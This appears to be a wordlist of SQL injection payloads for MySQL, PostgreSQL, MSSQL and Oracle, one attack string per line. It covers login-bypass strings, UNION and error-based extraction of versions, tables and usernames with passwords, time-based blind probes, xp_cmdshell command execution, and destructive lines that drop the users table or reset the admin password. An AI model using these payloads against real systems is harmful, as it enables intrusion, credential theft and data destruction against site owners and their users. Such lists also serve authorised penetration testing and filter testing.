# SQLi Error-Based Payloads — MySQL / PostgreSQL / MSSQL / Oracle
# Each line is a single payload. Lines starting with # are comments.
' OR 1=1--
' OR '1'='1
" OR "1"="1
' OR 1=1#
' OR 1=1/*
') OR ('1'='1
')) OR (('1'='1
' OR ''='
' OR 1=1-- -
' OR 1=1;--
admin'--
admin' #
admin'/*
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
1' ORDER BY 1--
1' ORDER BY 10--
1' ORDER BY 100--
' AND 1=CONVERT(int,(SELECT @@version))--
' AND 1=1--
' AND 1=2--
' AND 'a'='a
' AND 'a'='b
' OR 1=1 LIMIT 1--
' OR 1=1 LIMIT 1,1--
' OR 1=1 ORDER BY 1--
1 OR 1=1
1' OR '1'='1
1" OR "1"="1
' AND extractvalue(1,concat(0x7e,version()))--
' AND updatexml(1,concat(0x7e,version()),1)--
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND EXP(~(SELECT * FROM (SELECT version())a))--
' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(version()) FROM dual) USING utf8)))--
' AND GTID_SUBSET(CONCAT(version()),1)--
' AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1))a)--
' AND ROW(1,1)>(SELECT COUNT(*),CONCAT(version(),0x3a,FLOOR(RAND(0)*2))x FROM (SELECT 1 UNION SELECT 2)a GROUP BY x LIMIT 1)--
' AND POLYGON((SELECT * FROM(SELECT * FROM(SELECT version())a)b))--
' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT version()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' HAVING 1=1--
' GROUP BY columnnames HAVING 1=1--
' AND 1=(SELECT TOP 1 @@version)--
' AND 1=db_name()--
' AND 1=CAST(@@version AS INT)--
';EXEC xp_cmdshell('whoami')--
' WAITFOR DELAY '0:0:5'--
' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT banner FROM v$version WHERE ROWNUM=1))--
' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT banner FROM v$version WHERE ROWNUM=1))--
' OR 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--
'||(SELECT ''||dbms_xdb.version FROM dual)||'
' AND 1=rawtohex(cast(version() as text))--
' AND 1=query_to_xml('SELECT version()',true,false,'')::text--
' AND (SELECT pg_sleep(5))--
' AND 1=CAST((SELECT version()) AS INTEGER)--
' UNION SELECT version(),NULL--
' UNION SELECT current_user(),NULL--
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns--
' UNION SELECT GROUP_CONCAT(table_name),NULL FROM information_schema.tables--
' UNION SELECT GROUP_CONCAT(username,0x3a,password),NULL FROM users--
' AND SUBSTRING(@@version,1,1)='5'--
' AND ASCII(SUBSTRING(@@version,1,1))>50--
' AND ORD(MID(version(),1,1))>50--
' AND LEFT(version(),1)='5'--
'\' OR 1=1--
%27 OR 1=1--
%27%20OR%201%3D1--
%2527 OR 1=1--
' OR 1=1 %00
' OR 'x'='x
' OR 1 LIKE 1--
' OR 1 IN (1)--
' OR 1 BETWEEN 0 AND 2--
-1' UNION SELECT 1,2,3--
-1' UNION SELECT 1,2,3,4--
-1' UNION SELECT 1,2,3,4,5--
-1' UNION SELECT 1,2,3,4,5,6--
-1 UNION SELECT 1,2,3--
0 UNION SELECT 1,2,3--
null UNION SELECT 1,2,3--
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL,NULL--
' UNION ALL SELECT 1,@@version--
' UNION ALL SELECT 1,user()--
' UNION ALL SELECT 1,database()--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' XOR (SELECT(SLEEP(5)))--
' OR (SELECT SLEEP(5))--
' AND BENCHMARK(5000000,SHA1('test'))--
' OR BENCHMARK(5000000,SHA1('test'))--
' AND (SELECT 1 FROM dual WHERE 1=1)--
' AND 1=(SELECT 1 FROM information_schema.tables LIMIT 1)--
' OR EXISTS(SELECT * FROM users)--
' OR (SELECT COUNT(*) FROM users)>0--
'; DROP TABLE users--
'; INSERT INTO users VALUES('hacker','owned')--
'; UPDATE users SET password='owned' WHERE username='admin'--
1;SELECT IF(1=1,SLEEP(5),0)--
